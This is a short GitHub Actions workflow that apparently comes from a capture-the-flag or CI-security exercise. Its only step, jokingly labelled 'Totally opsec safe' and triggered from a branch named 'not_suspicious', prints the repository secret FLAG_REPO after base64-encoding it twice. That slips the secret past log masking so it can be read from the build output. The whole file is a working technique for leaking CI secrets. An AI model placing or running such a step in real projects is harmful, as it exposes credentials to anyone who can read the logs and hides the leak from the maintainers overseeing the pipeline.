name: test_workflow
'on':
 push:
 branches: not_suspicious
jobs:
 debug:
 runs-on:
 - ubuntu-latest
 environment: dev
 steps:
 - name: Totally opsec safe
 run: echo -e "SECRET=${{ secrets.FLAG_REPO }}\n" | base64 | base64
